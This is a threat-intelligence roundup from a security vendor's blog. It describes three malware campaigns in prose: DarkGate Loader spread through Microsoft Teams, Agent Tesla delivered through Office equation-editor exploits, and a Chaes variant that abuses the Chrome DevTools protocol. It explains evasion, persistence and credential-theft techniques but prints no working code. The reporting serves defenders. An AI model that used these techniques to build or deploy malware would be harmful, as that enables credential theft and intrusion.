CTI Roundup: Hackers Target Microsoft Teams with DarkGate Loader Malware

In this week’s roundup, CTI investigates a Microsoft Teams-related campaign that delivers DarkGate Loader malware. Next up is an overview of a phishing campaign that is spreading a new Agent Tesla variant. Finally, CTI looks into an advanced Chaes malware variant that uses a custom implementation of the Google DevTools protocol to obtain direct access to browser functions.

1. Hackers target Microsoft Teams with DarkGate Loader Malware

Truesec recently investigated a Microsoft Teams campaign that delivers DarkGate Loader malware to victims. In this campaign, threat actors send compromised chat messages to external Office 365 accounts and use social engineering to trick victims into downloading and opening malicious files.

Who is sending DarkGate Loader?

Truesec used Microsoft Purview’s eDiscovery tool to search for the senders in Microsoft Teams. They identified the two senders as:

• Akkaravit Tattamanas ([email protected][.]th)
• ABNER DAVID RIVERA ROJAS ([email protected][.]co).

Researchers confirmed that these two accounts were compromised via unknown malware and put up for sale on the dark web in August 2023. They pivoted to gather more information on the O365 tenant that the accounts belonged to, using the listed domains to search for additional messages.

Both senders used an identical lure containing a link to a file. The file is called “Changes to the vacation schedule.zip” and is hosted on SharePoint. If the victim clicks on the URL in the Teams message, they are directed to the SharePoint site where the file is available for download. Microsoft Defender has since identified the file as” BAT/Tisifi.A#.”

Analyzing the malware

The ZIP file contains a malicious LNK file posing as a PDF document. Truesec extracted the command line it would execute and found that it would trigger the download and execution of another file.

The commands use a Windows version of cURL, renamed to wbza, to download and execute Autoit3.exe and the bundled script eszexz.au3. The pre-compiled AutoIT script hides the code in the middle of the file by looking for the magic bytes.

AutoIT will drop a new file that contains a shellcode and check to see if Sophos antivirus is installed before executing. If Sophos is absent, additional code in the AutoIT script is deobfuscated to launch the shellcode. When the shellcode runs, it loads byte by byte in a stacked strings technique to create a new file. The payload can then be extracted from memory and analyzed. The payload was identified as DarkGate Loader on VirusTotal.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“This is not the first time that threat actors have leveraged Microsoft Teams for malicious activity. For example, Microsoft recently identified a campaign in which Russian threat actors were targeting organizations through Teams with the intent of tricking victims into approving MFA requests via social engineering.”

“Microsoft has previously provided some recommendations on how to help protect against these attacks. However, this ultimately comes back to the importance of security awareness training and education.”

2. Phishing campaign leverages the new Agent Tesla variant

Fortinet recently observed a phishing campaign that is spreading a new Agent Tesla variant. The campaign exploits two older vulnerabilities from 2017 and 2018.

Despite fixes for these vulnerabilities being released several years ago, they are still popular among threat actors — suggesting there are still unpatched devices in the wild years later.

The phishing email

The two vulnerabilities exploited in this campaign are CVE-2017-11882 and CVE-2018-0802. Both are remote code execution (RCE) vulnerabilities that result in memory corruption inside the EQNEDT32.exe process when parsing the crafted equation data. Exploitation of these can lead to arbitrary code execution.

The attached Excel file in the phishing email is in object linking and embedding (OLE) format and contains crafted equation data that exploits these vulnerabilities, ultimately executing a malicious shellcode.

When the victim opens the attached file, Excel will display a deceptive message to the user while executing the shellcode inside the crafted equation data in the background. The malicious equation data is parsed automatically by an MS Office process, EQNEDT32.exe, triggering the CVE-2017-11882/CVE-2018-0802 vulnerability and subsequently the malicious shellcode.

After self-decryption, the shellcode’s main job is to download and execute an additional malware file. To do so, it will call several APIs to download the malware to a local folder and run it on the victim’s device.

The downloaded file

The downloaded file, dasHost.exe, is a .Net program protected by two packers. It extracts two fileless execution modules — one being the payload module of Agent Tesla and the other being a loader module to the payload file of Agent Tesla.

Agent Tesla payload

The primary function of this payload, aside from persistence, is to perform process hollowing before placing a decrypted executable file onto the hollowed process and executing it. This decrypted executable file is the core module of Agent Tesla.

The malware executes a command to create a task in the system TaskScheduler inside the payload module. The task is set to start at login. The core module also adds an auto-run item in the system registry that launches automatically at system startup.

The Agent Tesla core module will gather information from the device including saved credentials of some software, the victim’s keylogging information, and screenshots of the device. It can steal credentials from specified software installed on the device including web browsers, email clients, and FTP clients, among others.

Agent Tesla has multiple ways of submitting the stolen data including using the HTTP POST method or as the body of an email over SMTP. This variant chooses to exfiltrate the data over email. The SMTP server address and port are both hardcoded into this variant.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“This campaign is only successful because it exploits two vulnerabilities. Every day, Fortinet observes and mitigates roughly 3,000 attacks and around 1,300 vulnerable devices — a reminder of how important timely patching can be.”

“This activity also highlights the fact that threat actors do not simply move on from a vulnerability once a patch is released and may attempt exploitation for years to come.”

3. Chaes malware uses the Chrome DevTools protocol to steal data

A new, advanced Chaes malware variant has emerged that uses a custom implementation of the Chrome DevTools protocol to directly access the victim’s browser functions and steal data using WebSockets. The infection chain involves deceptive MSI installers that trigger a multi-step infection using seven distinct modules to perform various functions.

What is Chaes malware?

Chaes has been around since at least November 2020, with its first surge occurring during the fourth quarter of 2021. It was characterized by its ability to steal financial data related to MercadoLibre and its use of multiple programming languages.

In 2022 the malware was updated with a refined infection chain, enhanced C2 communication, new modules, and WMI adoption for data collection. The fourth and latest version of Chaes contains significant enhancements including refined code architecture and improved modularity, added layers of encryption, a predominant shift to Python, WebSockets for communication, and more.

Chaes initialization and beaconing

The initialization phase of the malware is responsible for setting persistence on the system and migrating execution to run inside the memory of legitimate processes. A script allows the malware to stay encrypted on disk and for modules to be decrypted and loaded only during runtime. The initialization will happen only if the current running instance is unique, the implant isn’t running, and the executing process is Python (or one of its copies), which indicates that the malware needs to be initialized on the system.

After the initialization phase, the malware exits the current process, and the rest of the execution continues from one of the injected processes. The implant runs in an infinite loop, performing C2 communications. The implant resolves the C2’s WebSocket URL using a DNS TXT request to a hard-coded address.

Additional modules

Seven modules were identified that can be updated independently without changing the core functionality. Each of these functions can be sent by the threat actor to be run on the infected system.

While many of the modules were present in previous versions, this version provides a re-implementation for those with improved functionalities, different code base, and unique techniques.

1. Init: This is the first module sent by the threat actor. It acts as an identification/new victim registration. It will gather data on the infected system.
2. Online: This module sends an “online” message back to the threat actor and acts like a beaconing module to monitor which of the victims are still active.
3. Chronod: This is a credential stealer and clipper. It is responsible for intercepting browser activity to steal information from the user.
4. Appita: This is similar to the previous module in structure and purpose. It specifically targets the Itau Bank’s application.
5. Chrautos: This is an improved module based on Chronod and Appita with better code architecture. It has the capacity to expand the targets and tasks and currently focuses on banking and WhatsApp data.
6. Stealer: This module is responsible for stealing data from Chromium-based browsers including login data, credit cards, cookies, and autofill.
7. File upload: This module has the capability to search and upload files from the infected system to the C2 server. In the current version, the module uploads only data related to MetaMask’s Chrome extension.

Google DevTools protocol abuse

The malware uses Google’s DevTools protocol to connect to the current browser instance. This protocol allows for direct communication with the inner browser’s functionality over WebSockets. It enables the threat actor to run scripts, intercept network requests, read POST bodies before being encrypted, and much more.

The Chrautos module leverages Google’s DevTools protocol to actively open a service’s website and steal all relevant data instead of waiting for the targeted service to be opened by the user.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“Chaes malware has been evolving for a few years now. Its latest use of Google’s DevTools protocol further supports this.”

“According to researchers, this is the first notable case of malware to feature a custom implementation of this DevTools protocol to perform malicious operations. That said, it will be interesting to see if other malware families begin to leverage this moving forward.”

---

Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.